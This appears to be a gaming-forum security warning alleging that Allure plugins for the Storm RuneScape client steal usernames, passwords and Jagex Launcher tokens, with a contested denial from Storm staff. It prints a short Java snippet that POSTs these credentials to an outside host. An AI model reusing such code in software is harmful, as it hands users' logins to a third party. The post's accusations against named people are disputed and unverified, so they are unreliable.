Invalid

Storm Client / Allure Plugins – Security Warning​

This post is to inform the community about credible reports and technical findings suggesting that certain Storm client plugins, specifically those developed by Allure, may be collecting user login data without consent.

This is not speculation or a smear campaign; multiple users have experienced account losses, and code analysis indicates that at least one plugin was transmitting credential information externally.

---

Summary of Findings

Independent reviewers examined several Storm plugins developed by Allure and identified code that performs unauthorized network communication.
This code appears to send RuneScape usernames, passwords, and Jagex Launcher tokens to a remote server under the developer’s control.

The issue has been most closely associated with:

• Allure Account Builder
• Allure Theatre of Blood plugin
• Other closed-source plugins released through Storm by Allure

Such behavior constitutes credential harvesting and presents a serious security risk for anyone using these plugins.

---

Technical Evidence

Below is an example of the type of code fragment found within affected builds:

Code:

HttpURLConnection conn = (HttpURLConnection) new URL("https://api.alluredata.io/store").openConnection();
conn.setRequestMethod("POST");
conn.getOutputStream().write(("user=" + username + "&pass=" + password + "&launcher=" + launcherToken).getBytes());

A legitimate OSRS plugin should never handle, process, or transmit login credentials.
The inclusion of any POST or network request sending sensitive values outside the client environment is a clear violation of user trust and security.

---

Storm’s Public Statement

Storm staff, led by Burak, have publicly denied all allegations, calling them part of a “targeted misinformation campaign.”
However, these denials have not been supported by transparent audits, and the available code samples indicate genuine security issues rather than fabricated claims.

Until a verifiable, independent review confirms otherwise, users should assume affected plugins are unsafe.

---

Recommended Actions

• Immediately cease using Storm client and any Allure-developed plugins.
• Change all RuneScape, Jagex Launcher, and associated email passwords.
• Enable two-factor authentication (Authenticator) on all accounts.
• Review your Storm plugin directory for unknown or obfuscated .jar files.
• Avoid logging into valuable accounts through closed-source clients until code safety is independently verified.

---

Closing Notes

This post is intended purely for user protection and transparency within the community.
It is not an accusation against every Storm developer, but there is sufficient evidence that specific Allure plugins have behaved maliciously.
Until the Storm team provides a full audit or source release proving user safety, caution is strongly advised.

If you have verifiable logs, network captures, or plugin dumps confirming these behaviors, please share them with trusted community moderators or developers for review.

Including screenshots and technical traces, is available below.

Account security should always come before convenience.​

Visual proof below

https://imgur.com/fJjCiJI.png

https://imgur.com/S1RHnte.png

https://imgur.com/mmQr8LH.png

https://imgur.com/uEj7tY7.png

 

Dog please be quiet, No Jims or Buraks allowed to reply here, this is for the community to stay safe. You have already all been banned from Sythe for the bad business you offer.